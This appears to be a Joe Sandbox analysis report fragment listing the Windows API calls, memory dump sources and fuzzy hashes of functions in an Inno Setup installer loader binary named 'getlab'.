                                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90), ref: 00409A5C
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A25CF0.USER32(0001043E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 978128352-3001827809
                                                                          • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                          • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                          • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                          • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000,00409A77), ref: 00409A14
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000), ref: 00409A28
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90), ref: 00409A5C
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0225233C), ref: 0040966C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                          • String ID: D
                                                                          • API String ID: 3356880605-2746444292
                                                                          • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                          • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                          • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                          • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                          • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                          • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                          • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: .tmp$y@
                                                                          • API String ID: 2030045667-2396523267
                                                                          • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                          • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                          • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                          • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                          • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                          • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                          • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph: blocks 4076dc-407917 (WriteFile, InterlockedExchange, calls 40748c, 4073ec, 407890; edge list omitted)
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                          Control-flow Graph (basic block 406fa0-406ff3; calls SetErrorMode, LoadLibraryA)
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                          Control-flow Graph (basic blocks 40766c-4076a8; calls SetFilePointer, GetLastError)
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                          Control-flow Graph (basic blocks 40762c-40766a; calls ReadFile, GetLastError)
                                                                          APIs
                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID:
                                                                          • API String ID: 1948546556-0
                                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                          Control-flow Graph (basic blocks 4075c4-4075f9; calls SetFilePointer, GetLastError)
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                            • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                          • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                          • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                          • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID:
                                                                          • API String ID: 442123175-0
                                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                          • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
APIs
• SetEndOfFile.KERNEL32(?,02268000,0040A08C,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022503AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Similarity
• API ID: ErrorFileLast
• String ID:
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Similarity
• API ID: ErrorMode
• String ID:
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Similarity
• API ID: ErrorMode
• String ID:
APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Similarity
• API ID: CharPrev
• String ID:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Similarity
• API ID: AllocVirtual
• String ID:
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Similarity
• API ID: FreeVirtual
• String ID:
APIs
Similarity
• API ID: CloseHandle
• String ID:
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Similarity
• API ID: FreeVirtual
• String ID:
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Strings
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
• SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
Similarity
• API ID: InfoLocale
• String ID:
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Similarity
• API ID: SystemTime
• String ID:
APIs
• GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
Similarity
• API ID: Version
• String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
